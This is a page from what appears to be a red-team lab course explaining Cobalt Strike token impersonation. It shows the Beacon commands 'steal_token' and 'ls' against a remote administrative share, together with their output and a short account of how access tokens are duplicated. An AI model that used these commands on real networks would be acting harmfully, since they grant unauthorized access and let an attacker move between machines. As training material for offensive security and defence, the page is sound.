Token Impersonation

We have already seen an example of using Cobalt Strike's steal_token command in the context of pass the ticket. However, if we elevate or land on a system where a user is running a process, we can impersonate its token without having to jump through additional hoops.

If we list the running processes on Workstation 2 from an elevated prompt, we see that jking is running an instance of mmc.exe.

 PID   PPID  Name                                   Arch  Session     User
 ---   ----  ----                                   ----  -------     ----
 5536  1020  mmc.exe                                x64   0           DEV\jking

We can simply steal its token and access a target.

beacon> steal_token 5536

beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys

This technique works by obtaining a handle to the target process, opening and duplicating its primary access token, and then impersonating that token. The downside is that if the user closes the process, our ability to abuse it goes away. By taking the additional steps of extracting tickets or hashes, we provide ourselves a more guaranteed or "future-proof" way of leveraging the credential material.

When impersonating users in this way, the CS client (since 4.8) updates several UI elements to help you keep track of who (if anybody) you're Beacon is currently impersonating.

PreviousOverpass the HashNextToken Store

Last updated